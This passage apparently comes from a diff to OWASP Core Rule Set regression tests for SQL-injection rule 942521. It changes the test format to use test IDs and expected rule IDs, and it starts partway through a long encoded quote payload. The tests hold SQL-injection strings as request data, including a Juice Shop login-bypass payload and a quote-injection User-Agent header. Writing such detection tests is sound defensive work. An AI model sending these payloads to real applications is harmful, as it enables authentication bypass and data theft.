%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60
%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40
%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21
%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%
22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 18 desc: "Performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'
.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.
'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 19 desc: "Negative test: performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'
.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: 
"var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.
'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 20 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 21 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and starts_with(password) and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - 